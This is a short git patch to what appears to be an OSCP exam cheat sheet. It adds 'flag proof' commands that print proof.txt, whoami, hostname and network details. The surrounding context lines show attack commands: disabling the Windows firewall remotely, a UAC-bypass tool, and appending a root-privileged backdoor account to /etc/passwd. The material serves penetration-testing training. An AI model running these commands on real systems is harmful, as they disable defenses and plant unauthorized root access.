From 66f0f5d3c9f956e3d551bcccef5f16375c6bb916 Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Fri, 28 Oct 2022 14:25:00 -0400 Subject: [PATCH] Update README.md --- README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/README.md b/README.md index 66b78a4..005205c 100644 --- a/README.md +++ b/README.md @@ -1100,6 +1100,9 @@ eventvwr-bypassuac-32.exe # Disable Windows Firewall netsh advfirewall set allprofiles state off service_exec(conn, r'cmd /c netsh advfirewall set allprofiles state off') + +# OSCP Flag Proof +type proof.txt && whoami && hostname && ipconfig ``` #### Credential Access @@ -1536,6 +1539,9 @@ echo "temp:\$1\$ignite\$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash" >> /etc su temp pass pass123 + +# OSCP Flag Proof +cat proof.txt && whoami && hostname && ip addr ``` #### Service Exploits